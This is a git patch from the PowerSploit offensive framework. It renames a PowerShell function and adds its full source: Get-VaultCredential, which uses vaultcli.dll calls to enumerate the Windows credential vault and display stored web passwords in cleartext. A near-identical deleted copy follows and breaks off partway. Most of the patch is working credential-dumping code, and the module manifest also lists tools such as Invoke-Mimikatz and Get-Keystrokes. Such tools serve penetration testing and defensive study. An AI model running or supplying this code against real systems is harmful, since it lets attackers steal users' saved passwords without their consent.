From 8c2411ccf3e9f880bbb8bd77aa727980ab0f58b6 Mon Sep 17 00:00:00 2001 From: mattifestation Date: Mon, 30 Jun 2014 15:20:48 -0400 Subject: Get-VaultCredential now takes the singular form. --- Exfiltration/Exfiltration.psd1 | 4 +- Exfiltration/Get-VaultCredential.ps1 | 401 +++++++++++++++++++++++++++++++ Exfiltration/Get-VaultCredential.ps1xml | 37 +++ Exfiltration/Get-VaultCredentials.ps1 | 401 ------------------------------- Exfiltration/Get-VaultCredentials.ps1xml | 37 --- 5 files changed, 440 insertions(+), 440 deletions(-) create mode 100644 Exfiltration/Get-VaultCredential.ps1 create mode 100644 Exfiltration/Get-VaultCredential.ps1xml delete mode 100644 Exfiltration/Get-VaultCredentials.ps1 delete mode 100644 Exfiltration/Get-VaultCredentials.ps1xml (limited to 'Exfiltration') diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1 index 9d3ef00..6776b14 100644 --- a/Exfiltration/Exfiltration.psd1 +++ b/Exfiltration/Exfiltration.psd1 @@ -25,7 +25,7 @@ Description = 'PowerSploit Exfiltration Module' PowerShellVersion = '2.0' # Format files (.ps1xml) to be loaded when importing this module -FormatsToProcess = 'Get-VaultCredentials.ps1xml' +FormatsToProcess = 'Get-VaultCredential.ps1xml' # Functions to export from this module FunctionsToExport = '*' @@ -46,6 +46,6 @@ ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1', 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1', 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1', - 'VolumeShadowCopyTools.ps1', 'Get-VaultCredentials.ps1', 'Get-VaultCredentials.ps1xml' + 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml' } diff --git a/Exfiltration/Get-VaultCredential.ps1 b/Exfiltration/Get-VaultCredential.ps1 new file mode 100644 index 0000000..c830fa2 --- /dev/null +++ b/Exfiltration/Get-VaultCredential.ps1 @@ -0,0 +1,401 @@ +function Get-VaultCredential +{ +<# +.SYNOPSIS + +Displays Windows vault credential objects including cleartext web credentials. + +PowerSploit Function: Get-VaultCredential +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +Get-VaultCredential enumerates and displays all credentials stored in the Windows +vault. Web credentials, specifically are displayed in cleartext. This script was +inspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt + +.EXAMPLE + +Get-VaultCredential + +.NOTES + +Only web credentials can be displayed in cleartext. +#> + [CmdletBinding()] Param() + + $OSVersion = [Environment]::OSVersion.Version + $OSMajor = $OSVersion.Major + $OSMinor = $OSVersion.Minor + + #region P/Invoke declarations for vaultcli.dll + $DynAssembly = New-Object System.Reflection.AssemblyName('VaultUtil') + $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VaultUtil', $False) + + $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_ELEMENT_TYPE', 'Public', [Int32]) + $null = $EnumBuilder.DefineLiteral('Undefined', -1) + $null = $EnumBuilder.DefineLiteral('Boolean', 0) + $null = $EnumBuilder.DefineLiteral('Short', 1) + $null = $EnumBuilder.DefineLiteral('UnsignedShort', 2) + $null = $EnumBuilder.DefineLiteral('Int', 3) + $null = $EnumBuilder.DefineLiteral('UnsignedInt', 4) + $null = $EnumBuilder.DefineLiteral('Double', 5) + $null = $EnumBuilder.DefineLiteral('Guid', 6) + $null = $EnumBuilder.DefineLiteral('String', 7) + $null = $EnumBuilder.DefineLiteral('ByteArray', 8) + $null = $EnumBuilder.DefineLiteral('TimeStamp', 9) + $null = $EnumBuilder.DefineLiteral('ProtectedArray', 10) + $null = $EnumBuilder.DefineLiteral('Attribute', 11) + $null = $EnumBuilder.DefineLiteral('Sid', 12) + $null = $EnumBuilder.DefineLiteral('Last', 13) + $VAULT_ELEMENT_TYPE = $EnumBuilder.CreateType() + + $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_SCHEMA_ELEMENT_ID', 'Public', [Int32]) + $null = $EnumBuilder.DefineLiteral('Illegal', 0) + $null = $EnumBuilder.DefineLiteral('Resource', 1) + $null = $EnumBuilder.DefineLiteral('Identity', 2) + $null = $EnumBuilder.DefineLiteral('Authenticator', 3) + $null = $EnumBuilder.DefineLiteral('Tag', 4) + $null = $EnumBuilder.DefineLiteral('PackageSid', 5) + $null = $EnumBuilder.DefineLiteral('AppStart', 100) + $null = $EnumBuilder.DefineLiteral('AppEnd', 10000) + $VAULT_SCHEMA_ELEMENT_ID = $EnumBuilder.CreateType() + + $LayoutConstructor = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind]) + $CharsetField = [Runtime.InteropServices.StructLayoutAttribute].GetField('CharSet') + $StructLayoutCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($LayoutConstructor, + @([Runtime.InteropServices.LayoutKind]::Explicit), + $CharsetField, + @([Runtime.InteropServices.CharSet]::Ansi)) + $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' + + $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM', $StructAttributes, [Object], [System.Reflection.Emit.PackingSize]::Size4) + $null = $TypeBuilder.DefineField('SchemaId', [Guid], 'Public') + $null = $TypeBuilder.DefineField('pszCredentialFriendlyName', [IntPtr], 'Public') + $null = $TypeBuilder.DefineField('pResourceElement', [IntPtr], 'Public') + $null = $TypeBuilder.DefineField('pIdentityElement', [IntPtr], 'Public') + $null = $TypeBuilder.DefineField('pAuthenticatorElement', [IntPtr], 'Public') + if ($OSMajor -ge 6 -and $OSMinor -ge 2) + { + $null = $TypeBuilder.DefineField('pPackageSid', [IntPtr], 'Public') + } + $null = $TypeBuilder.DefineField('LastModified', [UInt64], 'Public') + $null = $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public') + $null = $TypeBuilder.DefineField('dwPropertiesCount', [UInt32], 'Public') + $null = $TypeBuilder.DefineField('pPropertyElements', [IntPtr], 'Public') + $VAULT_ITEM = $TypeBuilder.CreateType() + + $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM_ELEMENT', $StructAttributes) + $TypeBuilder.SetCustomAttribute($StructLayoutCustomAttribute) + $null = $TypeBuilder.DefineField('SchemaElementId', $VAULT_SCHEMA_ELEMENT_ID, 'Public').SetOffset(0) + $null = $TypeBuilder.DefineField('Type', $VAULT_ELEMENT_TYPE, 'Public').SetOffset(8) + $VAULT_ITEM_ELEMENT = $TypeBuilder.CreateType() + + + $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.Vaultcli', 'Public, Class') + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultOpenVault', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([Guid].MakeByRefType(), + [UInt32], + [IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultCloseVault', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultFree', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr]), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateVaults', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([Int32], + [Int32].MakeByRefType(), + [IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateItems', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr], + [Int32], + [Int32].MakeByRefType(), + [IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + if ($OSMajor -ge 6 -and $OSMinor -ge 2) + { + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr], + [Guid].MakeByRefType(), + [IntPtr], + [IntPtr], + [IntPtr], + [IntPtr], + [Int32], + [IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + } + else + { + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem', + 'vaultcli.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([IntPtr], + [Guid].MakeByRefType(), + [IntPtr], + [IntPtr], + [IntPtr], + [Int32], + [IntPtr].MakeByRefType()), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + } + + $Vaultcli = $TypeBuilder.CreateType() + #endregion + + # Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct. + function local:Get-VaultElementValue + { + Param ( + [ValidateScript({$_ -ne [IntPtr]::Zero})] + [IntPtr] + $VaultElementPtr + ) + + $PartialElement = [Runtime.InteropServices.Marshal]::PtrToStructure($VaultElementPtr, [Type] $VAULT_ITEM_ELEMENT) + $ElementPtr = [IntPtr] ($VaultElementPtr.ToInt64() + 16) + + switch ($PartialElement.Type) + { + $VAULT_ELEMENT_TYPE::String { + $StringPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr) + [Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] $StringPtr) + } + + $VAULT_ELEMENT_TYPE::Boolean { + [Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] $ElementPtr) + } + + $VAULT_ELEMENT_TYPE::Short { + [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr) + } + + $VAULT_ELEMENT_TYPE::UnsignedShort { + [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr) + } + + $VAULT_ELEMENT_TYPE::Int { + [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr) + } + + $VAULT_ELEMENT_TYPE::UnsignedInt { + [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr) + } + + $VAULT_ELEMENT_TYPE::Double { + [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Double]) + } + + $VAULT_ELEMENT_TYPE::Guid { + [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid]) + } + + $VAULT_ELEMENT_TYPE::Sid { + $SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr) + Write-Verbose "0x$($SidPtr.ToString('X8'))" + $SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr) + $SidObject.Value + } + + # These elements are currently unimplemented. + # I have yet to see these used in practice. + $VAULT_ELEMENT_TYPE::ByteArray { $null } + $VAULT_ELEMENT_TYPE::TimeStamp { $null } + $VAULT_ELEMENT_TYPE::ProtectedArray { $null } + $VAULT_ELEMENT_TYPE::Attribute { $null } + $VAULT_ELEMENT_TYPE::Last { $null } + } + } + + $VaultCount = 0 + $VaultGuidPtr = [IntPtr]::Zero + $Result = $Vaultcli::VaultEnumerateVaults(0, [Ref] $VaultCount, [Ref] $VaultGuidPtr) + + if ($Result -ne 0) + { + throw "Unable to enumerate vaults. Error (0x$($Result.ToString('X8')))" + } + + $GuidAddress = $VaultGuidPtr + + $VaultSchema = @{ + ([Guid] '2F1A6504-0641-44CF-8BB5-3612D865F2E5') = 'Windows Secure Note' + ([Guid] '3CCD5499-87A8-4B10-A215-608888DD3B55') = 'Windows Web Password Credential' + ([Guid] '154E23D0-C644-4E6F-8CE6-5069272F999F') = 'Windows Credential Picker Protector' + ([Guid] '4BF4C442-9B8A-41A0-B380-DD4A704DDB28') = 'Web Credentials' + ([Guid] '77BC582B-F0A6-4E15-4E80-61736B6F3B29') = 'Windows Credentials' + ([Guid] 'E69D7838-91B5-4FC9-89D5-230D4D4CC2BC') = 'Windows Domain Certificate Credential' + ([Guid] '3E0E35BE-1B77-43E7-B873-AED901B6275B') = 'Windows Domain Password Credential' + ([Guid] '3C886FF3-2669-4AA2-A8FB-3F6759A77548') = 'Windows Extended Credential' + ([Guid] '00000000-0000-0000-0000-000000000000') = $null + } + + if ($VaultCount) + { + foreach ($i in 1..$VaultCount) + { + $VaultGuid = [Runtime.InteropServices.Marshal]::PtrToStructure($GuidAddress, [Type] [Guid]) + $GuidAddress = [IntPtr] ($GuidAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid])) + + $VaultHandle = [IntPtr]::Zero + + Write-Verbose "Opening vault - $($VaultSchema[$VaultGuid]) ($($VaultGuid))" + + $Result = $Vaultcli::VaultOpenVault([Ref] $VaultGuid, 0, [Ref] $VaultHandle) + + if ($Result -ne 0) + { + Write-Error "Unable to open the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))" + continue + } + + $VaultItemCount = 0 + $VaultItemPtr = [IntPtr]::Zero + + $Result = $Vaultcli::VaultEnumerateItems($VaultHandle, 512, [Ref] $VaultItemCount, [Ref] $VaultItemPtr) + + if ($Result -ne 0) + { + $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle) + Write-Error "Unable to enumerate vault items from the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))" + continue + } + + $StructAddress = $VaultItemPtr + + if ($VaultItemCount) + { + foreach ($j in 1..$VaultItemCount) + { + $CurrentItem = [Runtime.InteropServices.Marshal]::PtrToStructure($StructAddress, [Type] $VAULT_ITEM) + $StructAddress = [IntPtr] ($StructAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] $VAULT_ITEM)) + + $PasswordVaultItem = [IntPtr]::Zero + + if ($OSMajor -ge 6 -and $OSMinor -ge 2) + { + $Result = $Vaultcli::VaultGetItem($VaultHandle, + [Ref] $CurrentItem.SchemaId, + $CurrentItem.pResourceElement, + $CurrentItem.pIdentityElement, + $CurrentItem.pPackageSid, + [IntPtr]::Zero, + 0, + [Ref] $PasswordVaultItem) + } + else + { + $Result = $Vaultcli::VaultGetItem($VaultHandle, + [Ref] $CurrentItem.SchemaId, + $CurrentItem.pResourceElement, + $CurrentItem.pIdentityElement, + [IntPtr]::Zero, + 0, + [Ref] $PasswordVaultItem) + } + + $PasswordItem = $null + + if ($Result -ne 0) + { + Write-Error "Error occured retrieving vault item. Error (0x$($Result.ToString('X8')))" + continue + } + else + { + $PasswordItem = [Runtime.InteropServices.Marshal]::PtrToStructure($PasswordVaultItem, [Type] $VAULT_ITEM) + } + + if ($VaultSchema.ContainsKey($VaultGuid)) + { + $VaultType = $VaultSchema[$VaultGuid] + } + else + { + $VaultType = $VaultGuid + } + + if ($PasswordItem.pAuthenticatorElement -ne [IntPtr]::Zero) + { + $Credential = Get-VaultElementValue $PasswordItem.pAuthenticatorElement + } + else + { + $Credential = $null + } + + $PackageSid = $null + + if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero)) + { + $PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid + } + + + $Properties = @{ + Vault = $VaultType + Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null } + Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null } + PackageSid = $PackageSid + Credential = $Credential + LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified) + } + + $VaultItem = New-Object PSObject -Property $Properties + $VaultItem.PSObject.TypeNames[0] = 'VAULTCLI.VAULTITEM' + + $VaultItem + + $null = $Vaultcli::VaultFree($PasswordVaultItem) + } + } + + $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle) + } + } +} \ No newline at end of file diff --git a/Exfiltration/Get-VaultCredential.ps1xml b/Exfiltration/Get-VaultCredential.ps1xml new file mode 100644 index 0000000..33e909f --- /dev/null +++ b/Exfiltration/Get-VaultCredential.ps1xml @@ -0,0 +1,37 @@ + + + + + VaultItemView + + VAULTCLI.VAULTITEM + + + + + + + Vault + + + Resource + + + Identity + + + Credential + + + PackageSid + + + LastModified + + + + + + + + diff --git a/Exfiltration/Get-VaultCredentials.ps1 b/Exfiltration/Get-VaultCredentials.ps1 deleted file mode 100644 index 4c33127..0000000 --- a/Exfiltration/Get-VaultCredentials.ps1 +++ /dev/null @@ -1,401 +0,0 @@ -function Get-VaultCredentials -{ -<# -.SYNOPSIS - -Displays Windows vault credential objects including cleartext web credentials. - -PowerSploit Function: Get-VaultCredentials -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -Get-VaultCredentials enumerates and displays all credentials stored in the Windows -vault. Web credentials, specifically are displayed in cleartext. This script was -inspired by the following C implementation: http://www.oxid.it/downloads/vaultdump.txt - -.EXAMPLE - -Get-VaultCredentials - -.NOTES - -Only web credentials can be displayed in cleartext. -#> - [CmdletBinding()] Param() - - $OSVersion = [Environment]::OSVersion.Version - $OSMajor = $OSVersion.Major - $OSMinor = $OSVersion.Minor - - #region P/Invoke declarations for vaultcli.dll - $DynAssembly = New-Object System.Reflection.AssemblyName('VaultUtil') - $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VaultUtil', $False) - - $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_ELEMENT_TYPE', 'Public', [Int32]) - $null = $EnumBuilder.DefineLiteral('Undefined', -1) - $null = $EnumBuilder.DefineLiteral('Boolean', 0) - $null = $EnumBuilder.DefineLiteral('Short', 1) - $null = $EnumBuilder.DefineLiteral('UnsignedShort', 2) - $null = $EnumBuilder.DefineLiteral('Int', 3) - $null = $EnumBuilder.DefineLiteral('UnsignedInt', 4) - $null = $EnumBuilder.DefineLiteral('Double', 5) - $null = $EnumBuilder.DefineLiteral('Guid', 6) - $null = $EnumBuilder.DefineLiteral('String', 7) - $null = $EnumBuilder.DefineLiteral('ByteArray', 8) - $null = $EnumBuilder.DefineLiteral('TimeStamp', 9) - $null = $EnumBuilder.DefineLiteral('ProtectedArray', 10) - $null = $EnumBuilder.DefineLiteral('Attribute', 11) - $null = $EnumBuilder.DefineLiteral('Sid', 12) - $null = $EnumBuilder.DefineLiteral('Last', 13) - $VAULT_ELEMENT_TYPE = $EnumBuilder.CreateType() - - $EnumBuilder = $ModuleBuilder.DefineEnum('VaultLib.VAULT_SCHEMA_ELEMENT_ID', 'Public', [Int32]) - $null = $EnumBuilder.DefineLiteral('Illegal', 0) - $null = $EnumBuilder.DefineLiteral('Resource', 1) - $null = $EnumBuilder.DefineLiteral('Identity', 2) - $null = $EnumBuilder.DefineLiteral('Authenticator', 3) - $null = $EnumBuilder.DefineLiteral('Tag', 4) - $null = $EnumBuilder.DefineLiteral('PackageSid', 5) - $null = $EnumBuilder.DefineLiteral('AppStart', 100) - $null = $EnumBuilder.DefineLiteral('AppEnd', 10000) - $VAULT_SCHEMA_ELEMENT_ID = $EnumBuilder.CreateType() - - $LayoutConstructor = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind]) - $CharsetField = [Runtime.InteropServices.StructLayoutAttribute].GetField('CharSet') - $StructLayoutCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($LayoutConstructor, - @([Runtime.InteropServices.LayoutKind]::Explicit), - $CharsetField, - @([Runtime.InteropServices.CharSet]::Ansi)) - $StructAttributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - - $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM', $StructAttributes, [Object], [System.Reflection.Emit.PackingSize]::Size4) - $null = $TypeBuilder.DefineField('SchemaId', [Guid], 'Public') - $null = $TypeBuilder.DefineField('pszCredentialFriendlyName', [IntPtr], 'Public') - $null = $TypeBuilder.DefineField('pResourceElement', [IntPtr], 'Public') - $null = $TypeBuilder.DefineField('pIdentityElement', [IntPtr], 'Public') - $null = $TypeBuilder.DefineField('pAuthenticatorElement', [IntPtr], 'Public') - if ($OSMajor -ge 6 -and $OSMinor -ge 2) - { - $null = $TypeBuilder.DefineField('pPackageSid', [IntPtr], 'Public') - } - $null = $TypeBuilder.DefineField('LastModified', [UInt64], 'Public') - $null = $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public') - $null = $TypeBuilder.DefineField('dwPropertiesCount', [UInt32], 'Public') - $null = $TypeBuilder.DefineField('pPropertyElements', [IntPtr], 'Public') - $VAULT_ITEM = $TypeBuilder.CreateType() - - $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.VAULT_ITEM_ELEMENT', $StructAttributes) - $TypeBuilder.SetCustomAttribute($StructLayoutCustomAttribute) - $null = $TypeBuilder.DefineField('SchemaElementId', $VAULT_SCHEMA_ELEMENT_ID, 'Public').SetOffset(0) - $null = $TypeBuilder.DefineField('Type', $VAULT_ELEMENT_TYPE, 'Public').SetOffset(8) - $VAULT_ITEM_ELEMENT = $TypeBuilder.CreateType() - - - $TypeBuilder = $ModuleBuilder.DefineType('VaultLib.Vaultcli', 'Public, Class') - $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultOpenVault', - 'vaultcli.dll', - 'Public, Static', - [Reflection.CallingConventions]::Standard, - [Int32], - [Type[]] @([Guid].MakeByRefType(), - [UInt32], - [IntPtr].MakeByRefType()), - [Runtime.InteropServices.CallingConvention]::Winapi, - [Runtime.InteropServices.CharSet]::Auto) - - $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultCloseVault', - 'vaultcli.dll', - 'Public, Static', - [Reflection.CallingConventions]::Standard, - [Int32], - [Type[]] @([IntPtr].MakeByRefType()), - [Runtime.InteropServices.CallingConvention]::Winapi, - [Runtime.InteropServices.CharSet]::Auto) - - $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultFree', - 'vaultcli.dll', - 'Public, Static', - [Reflection.CallingConventions]::Standard, - [Int32], - [Type[]] @([IntPtr]), - [Runtime.InteropServices.CallingConvention]::Winapi, - [Runtime.InteropServices.CharSet]::Auto) - - $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateVaults', - 'vaultcli.dll', - 'Public, Static', - [Reflection.CallingConventions]::Standard, - [Int32], - [Type[]] @([Int32], - [Int32].MakeByRefType(), - [IntPtr].MakeByRefType()), - [Runtime.InteropServices.CallingConvention]::Winapi, - [Runtime.InteropServices.CharSet]::Auto) - - $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultEnumerateItems', - 'vaultcli.dll', - 'Public, Static', - [Reflection.CallingConventions]::Standard, - [Int32], - [Type[]] @([IntPtr], - [Int32], - [Int32].MakeByRefType(), - [IntPtr].MakeByRefType()), - [Runtime.InteropServices.CallingConvention]::Winapi, - [Runtime.InteropServices.CharSet]::Auto) - - if ($OSMajor -ge 6 -and $OSMinor -ge 2) - { - $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem', - 'vaultcli.dll', - 'Public, Static', - [Reflection.CallingConventions]::Standard, - [Int32], - [Type[]] @([IntPtr], - [Guid].MakeByRefType(), - [IntPtr], - [IntPtr], - [IntPtr], - [IntPtr], - [Int32], - [IntPtr].MakeByRefType()), - [Runtime.InteropServices.CallingConvention]::Winapi, - [Runtime.InteropServices.CharSet]::Auto) - } - else - { - $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('VaultGetItem', - 'vaultcli.dll', - 'Public, Static', - [Reflection.CallingConventions]::Standard, - [Int32], - [Type[]] @([IntPtr], - [Guid].MakeByRefType(), - [IntPtr], - [IntPtr], - [IntPtr], - [Int32], - [IntPtr].MakeByRefType()), - [Runtime.InteropServices.CallingConvention]::Winapi, - [Runtime.InteropServices.CharSet]::Auto) - } - - $Vaultcli = $TypeBuilder.CreateType() - #endregion - - # Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct. - function local:Get-VaultElementValue - { - Param ( - [ValidateScript({$_ -ne [IntPtr]::Zero})] - [IntPtr] - $VaultElementPtr - ) - - $PartialElement = [Runtime.InteropServices.Marshal]::PtrToStructure($VaultElementPtr, [Type] $VAULT_ITEM_ELEMENT) - $ElementPtr = [IntPtr] ($VaultElementPtr.ToInt64() + 16) - - switch ($PartialElement.Type) - { - $VAULT_ELEMENT_TYPE::String { - $StringPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr) - [Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] $StringPtr) - } - - $VAULT_ELEMENT_TYPE::Boolean { - [Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] $ElementPtr) - } - - $VAULT_ELEMENT_TYPE::Short { - [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr) - } - - $VAULT_ELEMENT_TYPE::UnsignedShort { - [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] $ElementPtr) - } - - $VAULT_ELEMENT_TYPE::Int { - [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr) - } - - $VAULT_ELEMENT_TYPE::UnsignedInt { - [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] $ElementPtr) - } - - $VAULT_ELEMENT_TYPE::Double { - [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Double]) - } - - $VAULT_ELEMENT_TYPE::Guid { - [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid]) - } - - $VAULT_ELEMENT_TYPE::Sid { - $SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr) - Write-Verbose "0x$($SidPtr.ToString('X8'))" - $SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr) - $SidObject.Value - } - - # These elements are currently unimplemented. - # I have yet to see these used in practice. - $VAULT_ELEMENT_TYPE::ByteArray { $null } - $VAULT_ELEMENT_TYPE::TimeStamp { $null } - $VAULT_ELEMENT_TYPE::ProtectedArray { $null } - $VAULT_ELEMENT_TYPE::Attribute { $null } - $VAULT_ELEMENT_TYPE::Last { $null } - } - } - - $VaultCount = 0 - $VaultGuidPtr = [IntPtr]::Zero - $Result = $Vaultcli::VaultEnumerateVaults(0, [Ref] $VaultCount, [Ref] $VaultGuidPtr) - - if ($Result -ne 0) - { - throw "Unable to enumerate vaults. Error (0x$($Result.ToString('X8')))" - } - - $GuidAddress = $VaultGuidPtr - - $VaultSchema = @{ - ([Guid] '2F1A6504-0641-44CF-8BB5-3612D865F2E5') = 'Windows Secure Note' - ([Guid] '3CCD5499-87A8-4B10-A215-608888DD3B55') = 'Windows Web Password Credential' - ([Guid] '154E23D0-C644-4E6F-8CE6-5069272F999F') = 'Windows Credential Picker Protector' - ([Guid] '4BF4C442-9B8A-41A0-B380-DD4A704DDB28') = 'Web Credentials' - ([Guid] '77BC582B-F0A6-4E15-4E80-61736B6F3B29') = 'Windows Credentials' - ([Guid] 'E69D7838-91B5-4FC9-89D5-230D4D4CC2BC') = 'Windows Domain Certificate Credential' - ([Guid] '3E0E35BE-1B77-43E7-B873-AED901B6275B') = 'Windows Domain Password Credential' - ([Guid] '3C886FF3-2669-4AA2-A8FB-3F6759A77548') = 'Windows Extended Credential' - ([Guid] '00000000-0000-0000-0000-000000000000') = $null - } - - if ($VaultCount) - { - foreach ($i in 1..$VaultCount) - { - $VaultGuid = [Runtime.InteropServices.Marshal]::PtrToStructure($GuidAddress, [Type] [Guid]) - $GuidAddress = [IntPtr] ($GuidAddress.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid])) - - $VaultHandle = [IntPtr]::Zero - - Write-Verbose "Opening vault - $($VaultSchema[$VaultGuid]) ($($VaultGuid))" - - $Result = $Vaultcli::VaultOpenVault([Ref] $VaultGuid, 0, [Ref] $VaultHandle) - - if ($Result -ne 0) - { - Write-Error "Unable to open the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))" - continue - } - - $VaultItemCount = 0 - $VaultItemPtr = [IntPtr]::Zero - - $Result = $Vaultcli::VaultEnumerateItems($VaultHandle, 512, [Ref] $VaultItemCount, [Ref] $VaultItemPtr) - - if ($Result -ne 0) - { - $null = $Vaultcli::VaultCloseVault([Ref] $VaultHandle) - Write-Error "Unable to enumerate vault items from the following vault: $($VaultSchema[$VaultGuid]). Error (0x$($Result.ToString('X8')))" - continue - } - - $StructAddress = $VaultItemPtr - - if ($VaultItemCount) - { - foreach ($j in 1..$VaultItemCount) - { 